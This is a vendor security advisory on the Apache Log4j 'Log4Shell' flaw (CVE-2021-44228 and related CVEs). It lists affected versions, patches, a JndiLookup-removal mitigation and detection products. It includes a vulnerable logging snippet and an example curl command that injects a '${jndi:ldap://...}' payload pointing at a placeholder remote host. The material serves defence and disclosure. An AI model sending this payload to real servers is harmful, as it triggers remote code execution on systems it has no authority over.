The Apache Log4j 2 vulnerability (CVE-2021-44228) was revealed on Twitter and Github alongside POC on December 10th, 2021. It is the remote code execution (RCE) vulnerability of the Log4j software, which can include the remote Java object address in the log message and run it in the vulnerable server. Alibaba’s cloud security team first reported the vulnerability to the Apache Software Foundation on November 24th, 2021, and the first patch was distributed on December 6th, 2021. Patch is continually being released, and below is the information of the patch.
1. Affected Products and Versions
The products that fall under the following condition are affected by the vulnerability.
- Apache Log4j 2.0-beta9 to 2.12.1 and 2.13.0 to 2.15.0 version
- All versions of Apache Log4j 1.2.x
2. Vulnerability Exploitation Techniques
If a service using Log4j includes a code that records strings sent to the user-agent as logs, the following exploitations can occur.
[Part of server source code]
static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.<em><em>class</em></em>.getName());
...
String userAgent = he.getRequestHeader("user-agent");
String response = "<h1>Hello There, " + userAgent + "!</h1>";
log.error("Request User Agent:{}", userAgent);
...
[Vulnerability Exploitation]
An attack that automatically executes the Java object located in xxx.xxx.xxx.xxx/a from the server
ex) # curl 127.0.0.1:8080 -H ‘X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}’
3. Resolved Vulnerability
- Vulnerability (CVE-2021-44228, CVSS 10.0) that the attacker can remote code execute via a log message in Log4j 2.x version
- Vulnerability (CVE-2021-45046, CVSS 3.7) in Log4j 2.x version that allows the attacker to cause Denied of Service via a log message.
- Vulnerability (CVE-2021-4104) that the attacker can remote code execute via a log message in Log4j 1.2.x version
4. Response to Vulnerability
1) Provide the following vulnerability patch via update on Dec 14th, 2021
- Log4j 2.16.0 or above (Java8 or above): https://logging.apache.org/log4j/2.x/download.html
- Log4j 2.12.2 Version (Java 7): To be released
2) Method for mitigating vulnerability if difficult to apply Log4j patch (See ATIP Security Recommendations)
- Version: Log4j 2.0-beta9 or above and 2.15.0 or below (excluding Log4j 2.12.2)
Remove JndiLookup class as the following
# zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- Version: Log4j 1.x
Disable the feature after deciding whether to use JMSAppender in Log4j 1.x
5. AhnLab Products Response Status
AhnLab can detect the vulnerability with TG/IPX, AIPS, and HIPS products.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
Reference 1) https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=36389
Reference 2) https://atip.ahnlab.com/ti/contents/security-advisory?i=0a053796-66db-4ce0-9c30-d3c19060670e
Categories:Response Guide
[…] [Alert] Apache Log4j 2 Vulnerability, Update Recommended […]